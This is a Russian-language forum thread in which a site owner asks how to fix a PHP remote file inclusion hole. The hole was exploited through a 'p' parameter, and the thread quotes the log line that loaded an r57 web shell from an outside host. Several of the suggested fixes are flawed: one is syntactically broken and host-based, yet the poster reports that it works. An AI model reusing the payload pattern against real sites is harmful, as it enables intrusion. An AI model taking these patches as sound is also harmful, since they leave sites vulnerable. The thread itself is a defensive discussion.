подсаживаются любые файлы в переменную

[moadip]

Помогите исправить баг,
вообщем есть сайт, который был удачно атакован кулцхакером,
вот лог

Код: Выделить всё

"POST /?p=http://www.netempresaseguros.com/r57.txt?? HTTP/1.1" 200 11865 "http://*****.ru/?p=http://www.netempresaseguros.com/r57.txt??""

как я панимаю через переменную 'p' подсадили какой-то левый файл,
соовтветнно надо сделать или какую нить проверку, или что-бы через данную переменную могли выполнятся только файлы которые находятся на сервере.
в файле index.php нашёл такие строки

Код: Выделить всё

@$page=$HTTP_GET_VARS['p'];
else {require($page.".html");

что в них надо добавить что-бы файлы с другого сайта неподсаживались ?
p.s. в google уже был, чё-то ничего дельного ненашёл.....

[Хостинг HostFood.ru]

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

[zg]

проверяй путь к файлу через realpath()

[ADRE]

можно извратится через parse_url() и если урл не равен заданному -> в жопу переменную....
справочник функций есть? если нету то есть на php.net и где-то был одним аштмл архивом

[moadip]

с пхп совсем плохо,
можете носом тыкнуть, что надо сделать...

[ADRE]

Код: Выделить всё

$ php -r 'print_r( parse_url("http://username:password@hostname/path?arg=value#anchor"));'
Array
(
    [scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)

$ php -r 'print_r( parse_url("http://invalid_host..name/"));'
Array
(
    [scheme] => http
    [host] => invalid_host..name
    [path] => /
)

- это в примере, тебе надо:
когда идет проверка переменной короче:

Код: Выделить всё

@$page=$HTTP_GET_VARS['p'];
else {require($page.".html");

замени на:

Код: Выделить всё

$zlo = parse_url($HTTP_GET_VARS['p']);
if ($zlo['host'] != $_ENV['SERVER_NAME']) {
die('мая испугаться вас');
} else {
@$page=$HTTP_GET_VARS['p'];
else {require($page.".html");
}

- вот только не помню сервер нейм тащит http или без него....

[zg]

можно извратится через parse_url()

нда....

if ($zlo['host'] != $_ENV['SERVER_NAME'])

[moadip]

if ($zlo['host'] != $_ENV['SERVER_NAME'])

?
непрокатит ?

[zg]

Код: Выделить всё

$page = './'. strtr($page, array('../' => '/', "\0" => ''));
if (realpath($page))
  include($page);
else
  echo "Bad file name $page";

[moadip]

Код: Выделить всё

$page = './'. strtr($page, array('../' => '/', "\0" => ''));
if (realpath($page))
  include($page);
else
  echo "Bad file name $page";

просто добавить в существующий код ?

[zg]

нет

[ADRE]

ну так а что такого? ой бля ... там же много че написано ))) не досмотрел... ) мда то что предлогал - работать не будет .....
-----------------------
strtr() сначала всегда ищет самое длинное совпадение и *НЕ* пытается заменить то, с чем уже работала.
- круто блин ) что \-то таких вещей даже руки не доходили - хотя вроде банальная вещь ....

[zg]

и *НЕ* пытается заменить то, с чем уже работала.

в отличие от str_replace, которая ещё и жрёт кучу оперативы при этом

там же много че написано )))

действительно -)))

[moadip]

замени на:

Код: Выделить всё

$zlo = parse_url($HTTP_GET_VARS['p']);
if ($zlo['host'] != $_ENV['SERVER_NAME']) {
die('мая испугаться вас');
} else {
@$page=$HTTP_GET_VARS['p'];
else {require($page.".html");
}

- вот только не помню сервер нейм тащит http или без него....

спасибо,
работает

[ADRE]

и *НЕ* пытается заменить то, с чем уже работала.

в отличие от str_replace, которая ещё и жрёт кучу оперативы при этом

будем знать - а то str_replace в конец достал, долго ссылки заменяет адреса доменов, когда контент парсится )))

[ADRE]

замени на:

Код: Выделить всё

$zlo = parse_url($HTTP_GET_VARS['p']);
if ($zlo['host'] != $_ENV['SERVER_NAME']) {
die('мая испугаться вас');
} else {
@$page=$HTTP_GET_VARS['p'];
else {require($page.".html");
}

- вот только не помню сервер нейм тащит http или без него....

спасибо,
работает

и ниче не подгружает? то чего не надо?

[moadip]

не, нормуль
если вставить в переменную ссылку на другой сайт выплёвывает die('мая испугаться вас');